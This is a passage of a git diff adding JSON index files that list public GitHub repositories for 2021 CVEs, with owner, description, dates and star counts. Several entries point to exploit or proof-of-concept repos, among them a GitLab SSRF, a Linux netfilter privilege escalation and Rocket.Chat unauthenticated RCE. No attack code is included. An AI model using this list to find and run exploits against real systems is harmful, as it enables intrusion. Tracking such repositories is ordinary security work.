+ "forks": 17,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 381405553,
+ "name": "gitlab-cve-2021-22214",
+ "full_name": "Vulnmachines\/gitlab-cve-2021-22214",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/gitlab-cve-2021-22214",
+ "description": "Gitlab SSRF",
+ "fork": false,
+ "created_at": "2021-06-29T15:04:35Z",
+ "updated_at": "2023-09-28T11:29:06Z",
+ "pushed_at": "2022-07-26T05:25:05Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 423332466,
+ "name": "CVE-2021-22214",
+ "full_name": "antx-code\/CVE-2021-22214",
+ "owner": {
+ "login": "antx-code",
+ "id": 7877940,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7877940?v=4",
+ "html_url": "https:\/\/github.com\/antx-code"
+ },
+ "html_url": "https:\/\/github.com\/antx-code\/CVE-2021-22214",
+ "description": "Gitlab CI Lint API未授权 SSRF漏洞 CVE-2021-22214",
+ "fork": false,
+ "created_at": "2021-11-01T04:04:42Z",
+ "updated_at": "2023-09-28T11:32:50Z",
+ "pushed_at": "2021-11-04T02:21:28Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 444302213,
+ "name": "GitLab-SSRF-CVE-2021-22214",
+ "full_name": "kh4sh3i\/GitLab-SSRF-CVE-2021-22214",
+ "owner": {
+ "login": "kh4sh3i",
+ "id": 64693844,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4",
+ "html_url": "https:\/\/github.com\/kh4sh3i"
+ },
+ "html_url": "https:\/\/github.com\/kh4sh3i\/GitLab-SSRF-CVE-2021-22214",
+ "description": "POC for CVE-2021-22214: Gitlab SSRF",
+ "fork": false,
+ "created_at": "2022-01-04T05:52:57Z",
+ "updated_at": "2023-07-24T16:43:55Z",
+ "pushed_at": "2022-01-04T12:10:32Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "git",
+ "gitlab",
+ "poc",
+ "ssrf",
+ "ssrf-payload",
+ "ssrf-tool"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22555.json b/2021/CVE-2021-22555.json
new file mode 100644
index 0000000000..957a4d46bc
--- /dev/null
+++ b/2021/CVE-2021-22555.json
@@ -0,0 +1,307 @@
+[
+ {
+ "id": 386247610,
+ "name": "cve-2021-22555",
+ "full_name": "JoneyJunior\/cve-2021-22555",
+ "owner": {
+ "login": "JoneyJunior",
+ "id": 34868726,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34868726?v=4",
+ "html_url": "https:\/\/github.com\/JoneyJunior"
+ },
+ "html_url": "https:\/\/github.com\/JoneyJunior\/cve-2021-22555",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-15T10:17:42Z",
+ "updated_at": "2022-02-16T11:36:19Z",
+ "pushed_at": "2021-07-15T10:18:03Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 386476892,
+ "name": "CVE-2021-22555-Exploit",
+ "full_name": "xyjl-ly\/CVE-2021-22555-Exploit",
+ "owner": {
+ "login": "xyjl-ly",
+ "id": 85824157,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85824157?v=4",
+ "html_url": "https:\/\/github.com\/xyjl-ly"
+ },
+ "html_url": "https:\/\/github.com\/xyjl-ly\/CVE-2021-22555-Exploit",
+ "description": "CVE-2021-22555 Exploit",
+ "fork": false,
+ "created_at": "2021-07-16T01:54:01Z",
+ "updated_at": "2024-02-03T08:58:49Z",
+ "pushed_at": "2022-07-28T01:56:07Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 17,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 386739997,
+ "name": "container-cve-2021-22555",
+ "full_name": "cgwalters\/container-cve-2021-22555",
+ "owner": {
+ "login": "cgwalters",
+ "id": 244096,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/244096?v=4",
+ "html_url": "https:\/\/github.com\/cgwalters"
+ },
+ "html_url": "https:\/\/github.com\/cgwalters\/container-cve-2021-22555",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-16T19:12:57Z",
+ "updated_at": "2021-12-01T15:38:51Z",
+ "pushed_at": "2021-07-19T20:05:49Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 412296277,
+ "name": "CVE-2021-22555-esc-priv",
+ "full_name": "daletoniris\/CVE-2021-22555-esc-priv",
+ "owner": {
+ "login": "daletoniris",
+ "id": 4347515,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4347515?v=4",
+ "html_url": "https:\/\/github.com\/daletoniris"
+ },
+ "html_url": "https:\/\/github.com\/daletoniris\/CVE-2021-22555-esc-priv",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-01T02:18:45Z",
+ "updated_at": "2021-10-01T02:19:18Z",
+ "pushed_at": "2021-10-01T02:19:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 478003975,
+ "name": "CVE-2021-22555-PipeVersion",
+ "full_name": "veritas501\/CVE-2021-22555-PipeVersion",
+ "owner": {
+ "login": "veritas501",
+ "id": 25763545,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4",
+ "html_url": "https:\/\/github.com\/veritas501"
+ },
+ "html_url": "https:\/\/github.com\/veritas501\/CVE-2021-22555-PipeVersion",
+ "description": "CVE-2021-22555 exploit rewritten with pipe primitive",
+ "fork": false,
+ "created_at": "2022-04-05T06:35:25Z",
+ "updated_at": "2024-05-21T07:07:57Z",
+ "pushed_at": "2022-05-18T03:10:10Z",
+ "stargazers_count": 35,
+ "watchers_count": 35,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 35,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 639020308,
+ "name": "netsec-project",
+ "full_name": "masjohncook\/netsec-project",
+ "owner": {
+ "login": "masjohncook",
+ "id": 48942450,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48942450?v=4",
+ "html_url": "https:\/\/github.com\/masjohncook"
+ },
+ "html_url": "https:\/\/github.com\/masjohncook\/netsec-project",
+ "description": "Script of Network Security Project - Attack on CVE-2021-22555",
+ "fork": false,
+ "created_at": "2023-05-10T15:30:32Z",
+ "updated_at": "2023-06-06T16:17:03Z",
+ "pushed_at": "2023-05-26T03:21:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cyber",
+ "cybersecurity",
+ "metasploit",
+ "ubuntu2004"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 675095070,
+ "name": "CVE-2021-22555",
+ "full_name": "tukru\/CVE-2021-22555",
+ "owner": {
+ "login": "tukru",
+ "id": 17105451,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17105451?v=4",
+ "html_url": "https:\/\/github.com\/tukru"
+ },
+ "html_url": "https:\/\/github.com\/tukru\/CVE-2021-22555",
+ "description": "This repo hosts TUKRU's Linux Privilege Escalation exploit (CVE-2021-22555). It demonstrates gaining root privileges via a vulnerability. Tested on Ubuntu 5.8.0-48-generic and COS 5.4.89+. Use responsibly and ethically.",
+ "fork": false,
+ "created_at": "2023-08-05T18:56:18Z",
+ "updated_at": "2024-06-02T06:35:36Z",
+ "pushed_at": "2023-09-07T10:03:00Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 680824923,
+ "name": "CVE-2021-22555",
+ "full_name": "pashayogi\/CVE-2021-22555",
+ "owner": {
+ "login": "pashayogi",
+ "id": 50790111,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4",
+ "html_url": "https:\/\/github.com\/pashayogi"
+ },
+ "html_url": "https:\/\/github.com\/pashayogi\/CVE-2021-22555",
+ "description": "Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation'",
+ "fork": false,
+ "created_at": "2023-08-20T14:26:28Z",
+ "updated_at": "2024-02-24T11:42:55Z",
+ "pushed_at": "2023-08-20T14:29:26Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 752950250,
+ "name": "-2021-LOCALROOT-CVE-2021-22555",
+ "full_name": "letsr00t\/-2021-LOCALROOT-CVE-2021-22555",
+ "owner": {
+ "login": "letsr00t",
+ "id": 38699989,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4",
+ "html_url": "https:\/\/github.com\/letsr00t"
+ },
+ "html_url": "https:\/\/github.com\/letsr00t\/-2021-LOCALROOT-CVE-2021-22555",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-05T07:05:13Z",
+ "updated_at": "2024-02-05T07:05:13Z",
+ "pushed_at": "2024-02-05T07:05:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 763893253,
+ "name": "CVE-2021-22555",
+ "full_name": "letsr00t\/CVE-2021-22555",
+ "owner": {
+ "login": "letsr00t",
+ "id": 38699989,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4",
+ "html_url": "https:\/\/github.com\/letsr00t"
+ },
+ "html_url": "https:\/\/github.com\/letsr00t\/CVE-2021-22555",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-27T05:22:13Z",
+ "updated_at": "2024-02-27T05:22:47Z",
+ "pushed_at": "2024-02-27T05:22:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22569.json b/2021/CVE-2021-22569.json
new file mode 100644
index 0000000000..1f09a960e6
--- /dev/null
+++ b/2021/CVE-2021-22569.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 447451610,
+ "name": "A-potential-Denial-of-Service-issue-in-protobuf-java",
+ "full_name": "Mario-Kart-Felix\/A-potential-Denial-of-Service-issue-in-protobuf-java",
+ "owner": {
+ "login": "Mario-Kart-Felix",
+ "id": 76971465,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76971465?v=4",
+ "html_url": "https:\/\/github.com\/Mario-Kart-Felix"
+ },
+ "html_url": "https:\/\/github.com\/Mario-Kart-Felix\/A-potential-Denial-of-Service-issue-in-protobuf-java",
+ "description": "A potential Denial of Service issue in protobuf-java high severity GitHub Reviewed Published 5 days ago in protocolbuffers\/protobuf • Updated yesterday Vulnerability details Dependabot alerts 2 Package com.google.protobuf:protobuf-java (maven) Affected versions < 3.16.1 >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.16.1 3.18.2 3.19.2 Package com.google.protobuf:protobuf-kotlin (maven) Affected versions >= 3.18.0, < 3.18.2 >= 3.19.0, < 3.19.2 Patched versions 3.18.2 3.19.2 Package google-protobuf (RubyGems) Affected versions < 3.19.2 Patched versions 3.19.2 Description Summary A potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data. Reporter: OSS-Fuzz Affected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf \"javalite\" users (typically Android) are not affected. Severity CVE-2021-22569 High - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses. Proof of Concept For reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness. Remediation and Mitigation Please update to the latest available versions of the following packages: protobuf-java (3.16.1, 3.18.2, 3.19.2) protobuf-kotlin (3.18.2, 3.19.2) google-protobuf [JRuby gem only] (3.19.2) References GHSA-wrvw-hg22-4m67 https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-22569 https:\/\/bugs.chromium.org\/p\/oss-fuzz\/issues\/detail?id=39330 https:\/\/cloud.google.com\/support\/bulletins#gcp-2022-001",
+ "fork": false,
+ "created_at": "2022-01-13T03:33:54Z",
+ "updated_at": "2022-02-17T18:43:41Z",
+ "pushed_at": "2022-02-17T18:41:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22873.json b/2021/CVE-2021-22873.json
new file mode 100644
index 0000000000..0d9a0c1b66
--- /dev/null
+++ b/2021/CVE-2021-22873.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 669618948,
+ "name": "CVE-2021-22873-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2021-22873-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-22873-EXPLOIT",
+ "description": "A PoC exploit for CVE-2021-22873 - Revive Adserver Open Redirect Vulnerability.",
+ "fork": false,
+ "created_at": "2023-07-22T21:49:54Z",
+ "updated_at": "2024-04-24T15:52:41Z",
+ "pushed_at": "2023-08-09T10:51:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22880.json b/2021/CVE-2021-22880.json
new file mode 100644
index 0000000000..c5c66dd1ba
--- /dev/null
+++ b/2021/CVE-2021-22880.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 711816998,
+ "name": "CVE-2021-22880",
+ "full_name": "halkichi0308\/CVE-2021-22880",
+ "owner": {
+ "login": "halkichi0308",
+ "id": 42630259,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42630259?v=4",
+ "html_url": "https:\/\/github.com\/halkichi0308"
+ },
+ "html_url": "https:\/\/github.com\/halkichi0308\/CVE-2021-22880",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-30T08:30:12Z",
+ "updated_at": "2024-06-05T16:25:15Z",
+ "pushed_at": "2023-10-30T08:32:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22893.json b/2021/CVE-2021-22893.json
new file mode 100644
index 0000000000..5f37c9cc2c
--- /dev/null
+++ b/2021/CVE-2021-22893.json
@@ -0,0 +1,96 @@
+[
+ {
+ "id": 360115874,
+ "name": "CVE-2021-22893_HoneyPoC2",
+ "full_name": "ZephrFish\/CVE-2021-22893_HoneyPoC2",
+ "owner": {
+ "login": "ZephrFish",
+ "id": 5783068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4",
+ "html_url": "https:\/\/github.com\/ZephrFish"
+ },
+ "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2021-22893_HoneyPoC2",
+ "description": "DO NOT RUN THIS.",
+ "fork": false,
+ "created_at": "2021-04-21T09:48:57Z",
+ "updated_at": "2023-09-28T11:27:01Z",
+ "pushed_at": "2021-10-20T01:14:45Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 360122143,
+ "name": "CVE-2021-22893",
+ "full_name": "Mad-robot\/CVE-2021-22893",
+ "owner": {
+ "login": "Mad-robot",
+ "id": 25719480,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25719480?v=4",
+ "html_url": "https:\/\/github.com\/Mad-robot"
+ },
+ "html_url": "https:\/\/github.com\/Mad-robot\/CVE-2021-22893",
+ "description": "Pulse Connect Secure RCE Vulnerability (CVE-2021-22893)",
+ "fork": false,
+ "created_at": "2021-04-21T10:09:56Z",
+ "updated_at": "2022-11-09T18:11:59Z",
+ "pushed_at": "2021-04-21T10:12:51Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 413204436,
+ "name": "CVE-2021-22893",
+ "full_name": "orangmuda\/CVE-2021-22893",
+ "owner": {
+ "login": "orangmuda",
+ "id": 91846073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4",
+ "html_url": "https:\/\/github.com\/orangmuda"
+ },
+ "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-22893",
+ "description": "Proof On Concept — Pulse Secure CVE-2021-22893",
+ "fork": false,
+ "created_at": "2021-10-03T21:46:58Z",
+ "updated_at": "2023-09-28T11:32:00Z",
+ "pushed_at": "2022-02-24T22:56:29Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bash",
+ "bugbounty",
+ "code-injection"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22911.json b/2021/CVE-2021-22911.json
new file mode 100644
index 0000000000..e52c08001d
--- /dev/null
+++ b/2021/CVE-2021-22911.json
@@ -0,0 +1,182 @@
+[
+ {
+ "id": 374143127,
+ "name": "CVE-2021-22911",
+ "full_name": "CsEnox\/CVE-2021-22911",
+ "owner": {
+ "login": "CsEnox",
+ "id": 60170196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60170196?v=4",
+ "html_url": "https:\/\/github.com\/CsEnox"
+ },
+ "html_url": "https:\/\/github.com\/CsEnox\/CVE-2021-22911",
+ "description": "Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1",
+ "fork": false,
+ "created_at": "2021-06-05T15:05:01Z",
+ "updated_at": "2023-11-23T09:29:59Z",
+ "pushed_at": "2023-06-11T08:47:04Z",
+ "stargazers_count": 55,
+ "watchers_count": 55,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 55,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 391193611,
+ "name": "Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911",
+ "full_name": "optionalCTF\/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911",
+ "owner": {
+ "login": "optionalCTF",
+ "id": 45684709,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45684709?v=4",
+ "html_url": "https:\/\/github.com\/optionalCTF"
+ },
+ "html_url": "https:\/\/github.com\/optionalCTF\/Rocket.Chat-Automated-Account-Takeover-RCE-CVE-2021-22911",
+ "description": "Full unauthenticated RCE proof of concept for Rocket.Chat 3.12.1 CVE-2021-22911",
+ "fork": false,
+ "created_at": "2021-07-30T21:44:18Z",
+ "updated_at": "2024-04-08T12:45:11Z",
+ "pushed_at": "2021-07-30T22:00:52Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 408111498,
+ "name": "CVE-2021-22911",
+ "full_name": "jayngng\/CVE-2021-22911",
+ "owner": {
+ "login": "jayngng",
+ "id": 72692401,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72692401?v=4",
+ "html_url": "https:\/\/github.com\/jayngng"
+ },
+ "html_url": "https:\/\/github.com\/jayngng\/CVE-2021-22911",
+ "description": "Modifed ver of the original exploit to save some times on password reseting for unprivileged user",
+ "fork": false,
+ "created_at": "2021-09-19T11:43:06Z",
+ "updated_at": "2021-09-19T11:48:51Z",
+ "pushed_at": "2021-09-19T11:48:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 622121979,
+ "name": "CVE-2021-22911-rust",
+ "full_name": "ChrisPritchard\/CVE-2021-22911-rust",
+ "owner": {
+ "login": "ChrisPritchard",
+ "id": 30073148,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073148?v=4",
+ "html_url": "https:\/\/github.com\/ChrisPritchard"
+ },
+ "html_url": "https:\/\/github.com\/ChrisPritchard\/CVE-2021-22911-rust",
+ "description": "exploit for CVE-2021-22911 in rust",
+ "fork": false,
+ "created_at": "2023-04-01T07:19:54Z",
+ "updated_at": "2023-04-02T21:52:40Z",
+ "pushed_at": "2023-04-01T21:52:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 649901931,
+ "name": "CVE-2021-22911",
+ "full_name": "MrDottt\/CVE-2021-22911",
+ "owner": {
+ "login": "MrDottt",
+ "id": 50643409,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50643409?v=4",
+ "html_url": "https:\/\/github.com\/MrDottt"
+ },
+ "html_url": "https:\/\/github.com\/MrDottt\/CVE-2021-22911",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-05T22:26:26Z",
+ "updated_at": "2023-06-05T22:28:04Z",
+ "pushed_at": "2023-06-05T22:28:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 655936339,
+ "name": "CVE-2021-22911",
+ "full_name": "overgrowncarrot1\/CVE-2021-22911",
+ "owner": {
+ "login": "overgrowncarrot1",
+ "id": 78485709,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4",
+ "html_url": "https:\/\/github.com\/overgrowncarrot1"
+ },
+ "html_url": "https:\/\/github.com\/overgrowncarrot1\/CVE-2021-22911",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-19T23:56:09Z",
+ "updated_at": "2023-06-19T23:56:42Z",
+ "pushed_at": "2023-06-19T23:58:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22924.json b/2021/CVE-2021-22924.json
new file mode 100644
index 0000000000..23316657ea
--- /dev/null
+++ b/2021/CVE-2021-22924.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 487173629,
+ "name": "external_curl_AOSP10_r33_CVE-2021-22924",
+ "full_name": "Trinadh465\/external_curl_AOSP10_r33_CVE-2021-22924",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/external_curl_AOSP10_r33_CVE-2021-22924",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-30T03:40:15Z",
+ "updated_at": "2023-03-21T01:13:01Z",
+ "pushed_at": "2022-04-30T03:42:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22941.json b/2021/CVE-2021-22941.json
new file mode 100644
index 0000000000..c0ab49612d
--- /dev/null
+++ b/2021/CVE-2021-22941.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 416379571,
+ "name": "CVE-2021-22941",
+ "full_name": "hoavt184\/CVE-2021-22941",
+ "owner": {
+ "login": "hoavt184",
+ "id": 68089551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68089551?v=4",
+ "html_url": "https:\/\/github.com\/hoavt184"
+ },
+ "html_url": "https:\/\/github.com\/hoavt184\/CVE-2021-22941",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-12T14:52:38Z",
+ "updated_at": "2023-05-05T16:12:01Z",
+ "pushed_at": "2021-10-12T16:05:19Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
